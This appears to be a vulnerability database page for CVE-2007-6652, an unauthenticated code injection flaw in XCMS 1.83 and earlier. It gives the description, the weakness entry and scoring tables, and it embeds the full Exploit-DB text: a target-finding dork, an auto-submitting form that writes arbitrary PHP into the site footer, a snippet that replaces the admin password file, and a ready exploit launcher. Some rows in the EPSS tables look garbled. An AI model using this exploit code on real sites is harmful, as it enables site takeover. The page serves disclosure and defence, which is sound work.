CVE-2007-6652

CVE Descriptions

cpie.php in XCMS 1.83 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to conduct direct static code injection attacks and execute arbitrary code via the testo_0 parameter in a cpie admin action to index.php, which writes to dati/generali/footer.dtb (aka the XCMS footer).

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-94	Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	7.69%	–	–
2022-02-20	–	–	7.69%	–	–
2022-04-03	–	–	7.69%	–	–
2022-05-29	–	–	7.69%	–	–
2023-03-12	–	–	–	3.91%	–
2023-08-20	–	–	–	4.58%	–
2023-09-10	–	–	–	4.58%	–
2024-06-02	–	–	–	4.58%	–
2024-06-09	–	–	–	6.15%	–
2024-10-06	–	–	–	8.12%	–
2024-11-03	–	–	–	8.12%	–
2024-12-22	–	–	–	8.12%	–
2025-01-26	–	–	–	9.46%	–
2025-01-19	–	–	–	8.12%	–
2025-01-25	–	–	–	9.46%	–
2025-03-18	–	–	–	–	5.79%
2025-03-18	–	–	–	–	5.79,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	81%
2022-02-20	82%
2022-04-03	92%
2022-05-29	93%
2023-03-12	91%
2023-08-20	91%
2023-09-10	92%
2024-06-02	93%
2024-06-09	94%
2024-10-06	94%
2024-11-03	95%
2024-12-22	94%
2025-01-26	95%
2025-01-19	94%
2025-01-25	95%
2025-03-18	9%
2025-03-18	9%

Exploit information

Exploit Database EDB-ID : 4813

Publication date : 2007-12-29 23h00 +00:00
Author : x0kster
EDB Verified : Yes

Name : XCMS <= v1.83 Remote Command Execution Vulnerability Author : x0kster Email : x0kster@gmail.com Site : ihteam.net Script Download : http://www.xcms.it Date : 28/12/2007 Dork : inurl:"mod=notizie" The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms. Taking "home.php" for example: <?php //home.php [...] include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb" ?> So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel. So let's take a look to the bugged code. <?php //cpie.php [...] if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D [...] if(isset($_POST['salva'])){ Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control } [...] ?> So with a simple html form we can change the footer. Ex: <form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post"> <input type="hidden" name="salva" value="OK" /> <textarea name="testo_0"><?php YOUR PHP CODE ?></textarea> <input type="submit" value="Modifica" /> </form> <script>document.editor.submit()</script> Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials. Trick: We can change the admin panel password by inserting this code in the footer: <?php $pwd = "owned"; // <- Place here your new password. $pwd2 = md5($pwd); unlink("dati/generali/pass.php"); $f = fopen("dati/generali/pass.php",w); fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>"); fclose($f); ?> This code delete the old password file and then create a new one with your new password. Fix: <?php //cpie.php [...] if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug. [...] if(isset($_POST['salva'])){ Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control } [...] ?> So this is a simple exploit: <?php if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){ echo " <form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\"> <input type=\"hidden\" name=\"salva\" value=\"OK\" /> <textarea name=\"testo_0\">".$_POST['code']."</textarea> <input type=\"submit\" value=\"Modifica\" /> </form> <script>document.editor.submit()</script>"; }else{ echo" <pre> XCMS <= v1.82 Remote Command Execution Vulnerability Dork : inurl:\"mod=notizie\" by x0kster Visit ihteam.net </pre> <form method=POST action=".$_POST['PHP_SELF']."> <pre> Site : <input type=text name=site /> Code : <textarea name=code cols=49 rows=14>Your code here</textarea> <input type=submit value=Exploit /> <input type=hidden name=\"send\" /> </pre> </form>"; } ?> # milw0rm.com [2007-12-30]

Products Mentioned

Configuraton 0

Xcms>>Xcms >> Version To (including) 1.83

References

https://www.exploit-db.com/exploits/4813
Tags : exploit, x_refsource_EXPLOIT-DB

https://exchange.xforce.ibmcloud.com/vulnerabilities/39346
Tags : vdb-entry, x_refsource_XF

http://secunia.com/advisories/28256
Tags : third-party-advisory, x_refsource_SECUNIA

http://osvdb.org/40277
Tags : vdb-entry, x_refsource_OSVDB

CVE-2007-6652 : Detail